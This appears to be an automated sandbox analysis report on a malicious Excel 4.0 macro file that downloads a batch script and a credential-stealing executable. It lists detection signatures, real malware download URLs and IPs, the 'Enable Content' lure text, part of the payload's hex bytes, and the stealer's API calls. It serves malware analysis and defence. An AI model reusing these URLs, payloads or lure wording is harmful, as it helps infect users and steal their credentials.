Analysis Report ul9kpUwYel.xls

Overview

General Information

Sample Name: ul9kpUwYel.xls
Analysis ID: 337274
MD5: c2ca4d5f2632597023b6cf5b496fb4ed
SHA1: 076f6120eb80059c41e8d731d59471a2e9d81ad8
SHA256: 1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
Tags: SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell downloading file from url shortener site
Contains functionality to steal Internet Explorer form passwords
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Obfuscated Powershell
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://chebo.discountmonumentcenter.com/vantuz_2021.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: trashbininspector.fun Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe ReversingLabs: Detection: 72%
Multi AV Scanner detection for submitted file
Source: ul9kpUwYel.xls Virustotal: Detection: 41% Perma Link
Source: ul9kpUwYel.xls Metadefender: Detection: 22% Perma Link
Source: ul9kpUwYel.xls ReversingLabs: Detection: 34%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040B831 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0040B831
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00409D52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, 24_2_00409D52
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041A507 __EH_prolog,_strlen,CryptStringToBinaryA, 24_2_0041A507
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040A753 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0040A753
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040908B __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey, 24_2_0040908B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004233DC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 24_2_004233DC
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004235AF lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 24_2_004235AF
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040964F __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, 24_2_0040964F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004339BC lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA, 24_2_004339BC
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0029362C CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 24_2_0029362C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0028A757 __EH_prolog,_strlen,CryptStringToBinaryA, 24_2_0028A757
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002937FF CredEnumerateW,CryptUnprotectData,LocalFree,AuditFree, 24_2_002937FF
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027989F __EH_prolog,wsprintfA,CryptUnprotectData, 24_2_0027989F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027A9A3 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0027A9A3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027BA81 __EH_prolog,wsprintfA,_wcsstr,_wcsstr,_wcsstr,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 24_2_0027BA81
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002A3C0C lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlen, 24_2_002A3C0C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00279FA2 __EH_prolog,wsprintfA,_wcsstr,CryptUnprotectData,LocalFree, 24_2_00279FA2

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCD2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045F42D FindFirstFileExW, 24_2_0045F42D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCF2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_0043DE3D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_002AE08D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CF67D FindFirstFileExW, 24_2_002CF67D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF22
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF42
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA, 24_2_00434AFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cutt.ly
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.22.1.232:443

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Jan 2021 08:06:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 04 Jan 2021 21:24:49 GMTAccept-Ranges: bytesContent-Length: 565248Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 d5 65 2a f6 b4 0b 79 f6 b4 0b 79 f6 b4 0b 79 e8 e6 8f 79 ed b4 0b 79 e8 e6 9e 79 ee b4 0b 79 e8 e6 88 79 97 b4 0b 79 d1 72 70 79 fd b4 0b 79 f6 b4 0a 79 93 b4 0b 79 e8 e6 81 79 f7 b4 0b 79 e8 e6 9f 79 f7 b4 0b 79 e8 e6 9a 79 f7 b4 0b 79 52 69 63 68 f6 b4 0b 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 b8 18 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 30 08 00 00 80 00 00 00 c0 37 04 b0 36 3f 04 00 d0 37 04 00 00 40 04 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 40 04 00 10 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 71 40 04 60 01 00 00 00 00 40 04 04 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 38 3f 04 18 00 00 00 88 f6 3f 04 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 c0 37 04 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 08 00 00 d0 37 04 00 28 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 80 00 00 00 00 40 04 00 74 00 00 00 2c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.225.248 195.201.225.248
Source: Joe Sandbox View IP Address: 37.46.150.139 37.46.150.139
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.18.58.219:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: global traffic HTTP traffic detected: GET /bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vantuz_2021.exe HTTP/1.1Host: chebo.discountmonumentcenter.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004254E5 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 24_2_004254E5

E-Banking Fraud:

barindex
Drops certificate files (DER)
Source: C:\Users\user\AppData\Roaming\cr.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Jump to dropped file

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2156606049.000000000370B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
Source: Screenshot number: 4 Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
Source: Screenshot number: 8 Screenshot OCR: document is protected. 20 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work
Source: Screenshot number: 8 Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
Source: Screenshot number: 12 Screenshot OCR: document is protected. 21 :: 1. Open the document in Microsoft Office. Prev'ewir 24 25 work for
Source: Screenshot number: 12 Screenshot OCR: protected documents. 26 27 2. If you downloaded this document from your email 28 29 Editing" fro
Source: Document image extraction number: 0 Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
Source: Document image extraction number: 0 Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" on the yellow bar above.
Source: Document image extraction number: 1 Screenshot OCR: document is protected. 1. Open the document in Microsoft Office. Previewing online does not work f
Source: Document image extraction number: 1 Screenshot OCR: protected documents. 2. If you downloaded this document from your email, please click "Enable Edit
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" on the yellow bar above.
Found Excel 4.0 Macro with suspicious formulas
Source: ul9kpUwYel.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: ul9kpUwYel.xls Initial sample: High usage of CHAR() function: 21
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\cr.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\cr.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00412EFA 24_2_00412EFA
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00413396 24_2_00413396
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00425760 24_2_00425760
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040B831 24_2_0040B831
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00409D52 24_2_00409D52
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0046415B 24_2_0046415B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044217B 24_2_0044217B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004141D0 24_2_004141D0
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004181FE 24_2_004181FE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00436208 24_2_00436208
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041C2ED 24_2_0041C2ED
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004242AB 24_2_004242AB
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00442436 24_2_00442436
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040C498 24_2_0040C498
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043C4AE 24_2_0043C4AE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004365E1 24_2_004365E1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041A6B3 24_2_0041A6B3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040A753 24_2_0040A753
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00442840 24_2_00442840
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045CA0D 24_2_0045CA0D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044CCD8 24_2_0044CCD8
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00416D15 24_2_00416D15
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044CF0A 24_2_0044CF0A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043D000 24_2_0043D000
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004310FD 24_2_004310FD
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004350A7 24_2_004350A7
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044D16F 24_2_0044D16F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041930E 24_2_0041930E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004275AA 24_2_004275AA
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0040964F 24_2_0040964F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00417625 24_2_00417625
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00423778 24_2_00423778
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00461842 24_2_00461842
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0041186E 24_2_0041186E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00441898 24_2_00441898
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045D929 24_2_0045D929
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00413A83 24_2_00413A83
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00441C0A 24_2_00441C0A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00419CEB 24_2_00419CEB
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00417E68 24_2_00417E68
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00449EC0 24_2_00449EC0
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00447EFA 24_2_00447EFA
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00441EB4 24_2_00441EB4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459EB9 24_2_00459EB9
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459FD9 24_2_00459FD9
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002880B8 24_2_002880B8
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CA109 24_2_002CA109
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002BA110 24_2_002BA110
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B814A 24_2_002B814A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0028314A 24_2_0028314A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002BD15A 24_2_002BD15A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CA229 24_2_002CA229
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AD250 24_2_002AD250
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002BD3BF 24_2_002BD3BF
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00284420 24_2_00284420
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002944FB 24_2_002944FB
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0028C53D 24_2_0028C53D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002835E6 24_2_002835E6
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027C6E8 24_2_0027C6E8
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AC6FE 24_2_002AC6FE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00287875 24_2_00287875
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027989F 24_2_0027989F
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0028A903 24_2_0028A903
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027A9A3 24_2_0027A9A3
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002939C8 24_2_002939C8
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00281ABE 24_2_00281ABE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027BA81 24_2_0027BA81
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B2A90 24_2_002B2A90
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002D1A92 24_2_002D1A92
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B1AE8 24_2_002B1AE8
